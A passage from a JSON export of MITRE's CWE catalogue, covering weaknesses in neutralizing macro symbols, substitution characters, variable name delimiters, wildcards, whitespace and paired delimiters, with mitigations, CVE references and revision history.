\\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-30"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0770","Description":"Server trusts client to expand macros, allows macro characters to be expanded to trigger resultant information exposure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0770"},{"Reference":"CVE-2008-2018","Description":"Attacker can obtain sensitive information from a database by using a comment containing a macro, which inserts the data during expansion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2018"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Macro Symbol"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Notes":{"Note":{"#text":"Under-studied.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Macro Symbol","attr":{"@_Date":"2008-01-30"}},{"#text":"Failure to Remove Macro Symbol","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Macro Symbol","attr":{"@_Date":"2009-03-10"}},{"#text":"Improper Sanitization of Macro Symbols","attr":{"@_Date":"2010-04-05"}}]}},"153":{"attr":{"@_ID":"153","@_Name":"Improper Neutralization of Substitution Characters","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as substitution characters when they are sent to a downstream component.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that substitution characters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2002-0770","Description":"Server trusts client to expand macros, allows macro characters to be expanded to trigger resultant information exposure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0770"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Substitution Character"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Notes":{"Note":{"#text":"Under-studied.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Substitution Character","attr":{"@_Date":"2008-01-30"}},{"#text":"Failure to Remove Substitution Character","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Substitution Character","attr":{"@_Date":"2009-03-10"}},{"#text":"Improper Sanitization of Substitution Characters","attr":{"@_Date":"2010-04-05"}}]}},"154":{"attr":{"@_ID":"154","@_Name":"Improper Neutralization of Variable Name Delimiters","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as variable name delimiters when they are sent to a downstream component.","Extended_Description":"As data is parsed, an injected delimiter may cause the process to take unexpected actions that result in an attack. Example: \\"$\\" for an environment variable.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that variable name delimiters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-0129","Description":"\\"%\\" variable is expanded by wildcard function into disallowed commands.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0129"},{"Reference":"CVE-2002-0770","Description":"Server trusts client to expand macros, allows macro characters to be expanded to trigger resultant information exposure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0770"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Variable Name Delimiter"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"15"}}},"Notes":{"Note":{"#text":"Under-studied.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Variable Name Delimiter","attr":{"@_Date":"2008-01-30"}},{"#text":"Failure to Remove Variable Name Delimiter","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Variable Name Delimiter","attr":{"@_Date":"2009-03-10"}},{"#text":"Improper Sanitization of Variable Name Delimiters","attr":{"@_Date":"2010-04-05"}}]}},"155":{"attr":{"@_ID":"155","@_Name":"Improper Neutralization of Wildcards or Matching Symbols","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as wildcards or matching symbols when they are sent to a downstream component.","Extended_Description":"As data is parsed, an injected element may cause the process to take unexpected actions.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that wildcard or matching elements will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0433","Description":"Bypass file restrictions using wildcard character.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0433"},{"Reference":"CVE-2002-1010","Description":"Bypass file restrictions using wildcard character.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1010"},{"Reference":"CVE-2001-0334","Description":"Wildcards generate long string on expansion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0334"},{"Reference":"CVE-2004-1962","Description":"SQL injection involving \\"/**/\\" sequences.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1962"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Wildcard or Matching Element"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Notes":{"Note":{"#text":"Under-studied.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Wildcard or Matching Element","attr":{"@_Date":"2008-01-30"}},{"#text":"Failure to Remove Wildcard or Matching Element","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Wildcard or Matching Symbol","attr":{"@_Date":"2009-03-10"}},{"#text":"Improper Sanitization of Wildcards or Matching Symbols","attr":{"@_Date":"2010-04-05"}}]}},"156":{"attr":{"@_ID":"156","@_Name":"Improper Neutralization of Whitespace","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as whitespace when they are sent to a downstream component.","Extended_Description":"This can include space, tab, etc.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"White space"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that whitespace will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0637","Description":"MIE. virus protection bypass with RFC violations involving extra whitespace, or missing whitespace.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0637"},{"Reference":"CVE-2004-0942","Description":"CPU consumption with MIME headers containing lines with many space characters, probably due to algorithmic complexity (RESOURCE.AMP.ALG).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0942"},{"Reference":"CVE-2003-1015","Description":"MIE. whitespace interpreted differently by mail clients.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1015"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_ID":"SPEC.WHITESPACE","Entry_Name":"Whitespace"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Notes":{"Note":{"#text":"Can overlap other separator characters or delimiters.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Whitespace","attr":{"@_Date":"2008-01-30"}},{"#text":"Failure to Remove Whitespace","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Whitespace","attr":{"@_Date":"2009-03-10"}},{"#text":"Improper Sanitization of Whitespace","attr":{"@_Date":"2010-04-05"}}]}},"157":{"attr":{"@_ID":"157","@_Name":"Failure to Sanitize Paired Delimiters","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly handle the characters that are used to mark the beginning and ending of a group of entities, such as parentheses, brackets, and braces.","Extended_Description":{"xhtml:p":"Paired delimiters might include:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["&lt; and &gt; angle brackets","( and ) parentheses","{ and } braces","[ and ] square brackets","\\" \\" double quotes","\' \' single quotes"]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected 